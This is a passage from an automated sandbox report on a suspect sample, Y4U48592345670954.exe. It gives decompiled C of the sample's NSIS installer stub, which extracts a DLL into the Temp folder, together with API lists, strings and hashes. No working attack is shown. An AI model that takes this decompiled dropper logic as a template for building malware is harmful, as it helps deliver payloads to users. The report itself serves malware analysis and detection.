							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                        0x0040352c
                                        0x0040353d
                                        0x00403544
                                        0x00403546
                                        0x0040355a
                                        0x0040355f
                                        0x00403575
                                        0x0040357a
                                        0x00403580
                                        0x00403592
                                        0x00403592
                                        0x0040359d
                                        0x00403548
                                        0x00403553
                                        0x00403553
                                        0x004035a2
                                        0x004035ac
                                        0x004035b5
                                        0x004035c1
                                        0x00403647
                                        0x0040364f
                                        0x00403651
                                        0x00403657
                                        0x00403658
                                        0x00403658
                                        0x0040366e
                                        0x00403674
                                        0x00403682
                                        0x00403711
                                        0x00403719
                                        0x00403723
                                        0x00403728
                                        0x0040372e
                                        0x004037c0
                                        0x004037c5
                                        0x004037c7
                                        0x004037e3
                                        0x00000000
                                        0x004037e3
                                        0x004037c9
                                        0x004037cf
                                        0x004037d7
                                        0x004037d7
                                        0x00000000
                                        0x004037cf
                                        0x0040373c
                                        0x00403748
                                        0x0040374e
                                        0x00403750
                                        0x00403752
                                        0x00403755
                                        0x0040375e
                                        0x0040375e
                                        0x00403766
                                        0x0040376e
                                        0x00403770
                                        0x00403772
                                        0x00403777
                                        0x0040377d
                                        0x00403780
                                        0x00403786
                                        0x0040378d
                                        0x0040378d
                                        0x004037ac
                                        0x004037b6
                                        0x00000000
                                        0x004037bb
                                        0x0040371b
                                        0x0040371d
                                        0x00000000
                                        0x00403688
                                        0x00403688
                                        0x0040368e
                                        0x00403698
                                        0x004036a0
                                        0x004036aa
                                        0x004036b0
                                        0x004036be
                                        0x004037e8
                                        0x004037e8
                                        0x00000000
                                        0x004037e8
                                        0x004036c4
                                        0x004036cd
                                        0x0040370c
                                        0x00000000
                                        0x0040370c
                                        0x004035c7
                                        0x004035c7
                                        0x004035cc
                                        0x00000000
                                        0x00000000
                                        0x004035d6
                                        0x004035e5
                                        0x004035ea
                                        0x004035f1
                                        0x00000000
                                        0x00000000
                                        0x004035f5
                                        0x004035f7
                                        0x00403604
                                        0x00403604
                                        0x0040360c
                                        0x00403612
                                        0x0040363a
                                        0x00403642
                                        0x00000000
                                        0x00403624
                                        0x00403625
                                        0x0040362e
                                        0x00403634
                                        0x00403635
                                        0x00000000
                                        0x00403635
                                        0x00403630
                                        0x00403632
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403632
                                        0x00403612

                                        APIs
                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                        • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                        • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 00403607
                                        • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                        • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                        • LoadImageA.USER32 ref: 0040366E
                                        • RegisterClassA.USER32 ref: 004036B5
                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                        • CreateWindowExA.USER32 ref: 00403706
                                        • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                        • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                        • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                        • GetClassInfoA.USER32 ref: 0040376E
                                        • GetClassInfoA.USER32 ref: 0040377D
                                        • RegisterClassA.USER32 ref: 0040378D
                                        • DialogBoxParamA.USER32 ref: 004037AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: 'z$"C:\Users\user\Desktop\Y4U48592345670954.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                        • API String ID: 914957316-123529364
                                        • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                        • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                        • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                        • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 81%
                                        			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\jones\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x378da
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x378de
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                        0x00402c42
                                        0x00402c45
                                        0x00402c4b
                                        0x00402c4e
                                        0x00402c51
                                        0x00402c64
                                        0x00402c6a
                                        0x00402c7d
                                        0x00402c82
                                        0x00402c85
                                        0x00402c8b
                                        0x00000000
                                        0x00402c8d
                                        0x00402c98
                                        0x00402ca0
                                        0x00402ca6
                                        0x00402ca8
                                        0x00402cad
                                        0x00402caf
                                        0x00402dde
                                        0x00402de0
                                        0x00402de6
                                        0x00000000
                                        0x00000000
                                        0x00402de8
                                        0x00402deb
                                        0x00402e0f
                                        0x00402e1a
                                        0x00402e25
                                        0x00402e2a
                                        0x00402e2d
                                        0x00402e2e
                                        0x00402e2f
                                        0x00402e31
                                        0x00402e36
                                        0x00402e39
                                        0x00402e5a
                                        0x00402e5e
                                        0x00402e64
                                        0x00402e66
                                        0x00402e66
                                        0x00402e66
                                        0x00402e6e
                                        0x00402e72
                                        0x00402e79
                                        0x00402e7e
                                        0x00402e80
                                        0x00402e80
                                        0x00402e80
                                        0x00402e88
                                        0x00402e88
                                        0x00402e8b
                                        0x00402e8c
                                        0x00402e8c
                                        0x00402e8f
                                        0x00402e91
                                        0x00402e91
                                        0x00402e91
                                        0x00402e9b
                                        0x00402ea1
                                        0x00402eaf
                                        0x00402eb4
                                        0x00000000
                                        0x00402eb4
                                        0x00402e3c
                                        0x00000000
                                        0x00402e3c
                                        0x00402df3
                                        0x00402dfe
                                        0x00402e03
                                        0x00402e05
                                        0x00000000
                                        0x00000000
                                        0x00402e0a
                                        0x00402e0d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402cb5
                                        0x00402cb5
                                        0x00402cba
                                        0x00402cbe
                                        0x00402cc5
                                        0x00402cca
                                        0x00402ccc
                                        0x00402cce
                                        0x00402cce
                                        0x00402cd6
                                        0x00402cdb
                                        0x00402cdd
                                        0x00402e49
                                        0x00402e4d
                                        0x00402e52
                                        0x00402e52
                                        0x00402e42
                                        0x00000000
                                        0x00402e42
                                        0x00402ce5
                                        0x00402ceb
                                        0x00402d6c
                                        0x00402d70
                                        0x00402d72
                                        0x00402d75
                                        0x00402d7f
                                        0x00402d85
                                        0x00402d87
                                        0x00402da3
                                        0x00402da3
                                        0x00402d77
                                        0x00402d78
                                        0x00402d78
                                        0x00402d75
                                        0x00000000
                                        0x00402d70
                                        0x00402cf8
                                        0x00402cfd
                                        0x00402d00
                                        0x00402d06
                                        0x00000000
                                        0x00000000
                                        0x00402d0c
                                        0x00402d13
                                        0x00000000
                                        0x00000000
                                        0x00402d19
                                        0x00402d20
                                        0x00000000
                                        0x00000000
                                        0x00402d26
                                        0x00402d2d
                                        0x00000000
                                        0x00000000
                                        0x00402d2f
                                        0x00402d36
                                        0x00000000
                                        0x00000000
                                        0x00402d38
                                        0x00402d3b
                                        0x00402d3d
                                        0x00000000
                                        0x00000000
                                        0x00402d43
                                        0x00402d46
                                        0x00402d4c
                                        0x00402d50
                                        0x00402d56
                                        0x00402d5e
                                        0x00402d5e
                                        0x00402d61
                                        0x00402d61
                                        0x00402d64
                                        0x00402d66
                                        0x00402d68
                                        0x00402d68
                                        0x00000000
                                        0x00402d66
                                        0x00402d58
                                        0x00402d5c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402da6
                                        0x00402da6
                                        0x00402dac
                                        0x00402dbc
                                        0x00402dbc
                                        0x00402dbf
                                        0x00402dc5
                                        0x00402dc7
                                        0x00402dc7
                                        0x00402dcf
                                        0x00402dd3
                                        0x00402dd8
                                        0x00402dd8
                                        0x00000000
                                        0x00402dd3

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402C45
                                        • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                          • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                          • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                        • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                        • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                        Strings
                                        • Error launching installer, xrefs: 00402C8D
                                        • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                        • Inst, xrefs: 00402D19
                                        • verifying installer: %d%%, xrefs: 00402D89
                                        • "C:\Users\user\Desktop\Y4U48592345670954.exe" , xrefs: 00402C41
                                        • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                        • Null, xrefs: 00402D2F
                                        • soft, xrefs: 00402D26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                        • String ID: "C:\Users\user\Desktop\Y4U48592345670954.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                        • API String ID: 2181728824-61314569
                                        • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                        • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                        • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                        • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















                                        0x0040179d
                                        0x004017a4
                                        0x004017ad
                                        0x004017b0
                                        0x004017b3
                                        0x004017b8
                                        0x004017c0
                                        0x004017dc
                                        0x004017c2
                                        0x004017c2
                                        0x004017c3
                                        0x004017c3
                                        0x004017e2
                                        0x004017ec
                                        0x004017ec
                                        0x004017f0
                                        0x004017f3
                                        0x004017f8
                                        0x004017fa
                                        0x004017fc
                                        0x00401801
                                        0x00401801
                                        0x0040180c
                                        0x0040180c
                                        0x0040181d
                                        0x0040181f
                                        0x0040181f
                                        0x00401820
                                        0x00401820
                                        0x00401823
                                        0x00401826
                                        0x00401829
                                        0x0040182f
                                        0x0040182f
                                        0x00401833
                                        0x00401833
                                        0x0040183b
                                        0x0040184a
                                        0x0040184f
                                        0x00401852
                                        0x00401855
                                        0x00000000
                                        0x00000000
                                        0x00401857
                                        0x0040185a
                                        0x004018b4
                                        0x004018b9
                                        0x004015ca
                                        0x004026da
                                        0x004026da
                                        0x0040292f
                                        0x00402932
                                        0x00402932
                                        0x00000000
                                        0x0040185c
                                        0x00401862
                                        0x0040186d
                                        0x0040187a
                                        0x00401885
                                        0x0040189b
                                        0x0040189b
                                        0x0040189e
                                        0x00000000
                                        0x004018a4
                                        0x004018a4
                                        0x004018a5
                                        0x004018c2
                                        0x00402938
                                        0x00402938
                                        0x00402938
                                        0x004018a7
                                        0x004018a7
                                        0x004018a8
                                        0x00401495
                                        0x00402293
                                        0x00402293
                                        0x00402293
                                        0x004018a5
                                        0x0040189e
                                        0x0040293a
                                        0x0040293e
                                        0x0040293e
                                        0x004018d2
                                        0x004018d7
                                        0x004018dd
                                        0x004018de
                                        0x004018df
                                        0x004018e2
                                        0x004018e5
                                        0x004018ea
                                        0x004018f0
                                        0x004018f4
                                        0x004018f6
                                        0x004018fe
                                        0x0040190a
                                        0x004018f8
                                        0x004018f8
                                        0x004018fc
                                        0x00000000
                                        0x00000000
                                        0x004018fc
                                        0x00401913
                                        0x00401919
                                        0x0040191b
                                        0x00000000
                                        0x00401921
                                        0x00401921
                                        0x00401924
                                        0x0040193c
                                        0x00401926
                                        0x00401929
                                        0x00401932
                                        0x00401932
                                        0x00401941
                                        0x00401946
                                        0x0040228e
                                        0x00000000
                                        0x0040228e
                                        0x00000000

                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                        • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                        • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                        • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
